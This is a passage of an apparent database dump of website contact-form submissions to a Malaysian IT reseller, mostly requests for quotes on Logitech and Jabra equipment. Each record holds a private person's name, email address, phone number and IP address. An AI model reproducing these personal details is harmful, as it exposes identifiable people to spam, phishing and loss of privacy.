Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Logitech MeetUp, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:55:\"Also quote the optional Expansion microphone for MeetUp\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"77\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-15 17:23:31','60.50.163.145','1'),(111,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Austin\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"austinwong3_16@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123648452\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Self use\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"Kl\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Jabra Evolve 65t\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-17 11:39:39','113.210.104.201','1'),(112,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Mariana Anduk\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"mariana.anduk@unu.edu\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"38880481\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"United Nations University\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:88:\"Menara PJH, Level 10, No 2. Jalan Tun Abdul Razak, Precinct 2, 62100 Putrajaya, Malaysia\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"Please email us your quotation. Thank you.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-18 10:41:15','58.71.202.50','1'),(113,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Lor Vin Shen\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"lor.vin.shen1@huawei.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124856611\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Huawei Technologies (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Quotation for Zebra 110xi4 RFID Label Printer 1 unit\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-18 11:30:07','103.218.216.110','1'),(114,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Koay Eng Heng\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"joekoay@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126956321\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Cheetah Holding\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:56:\"any bank in malaysia using or recognize this eSignature?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-19 11:57:09','211.24.117.148','1'),(115,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Bryan Ng\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"bryanng@sdp-g.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"07-2536200\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"SDP GLOBAL (M) SDN. BHD.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Logitech Brio\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"33\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-21 16:17:44','1.9.134.194','1'),(116,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"To\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Nlto9822@gmil.Com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123785533\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Mu yi\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Looking for mz320 bag\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-21 16:57:44','113.210.181.159','1'),(117,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"yong ching ching\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"ccyong12@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"164142250\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Greenland Tebrau Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:87:\"would like to know more about docu sign and other e-signature app available in malaysia\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"87\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-24 16:32:28','14.192.211.207','1'),(118,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"yong ching ching\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"ccyong12@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"164142250\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Greenland Tebrau Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:87:\"would like to know more about docu sign and other e-signature app available in 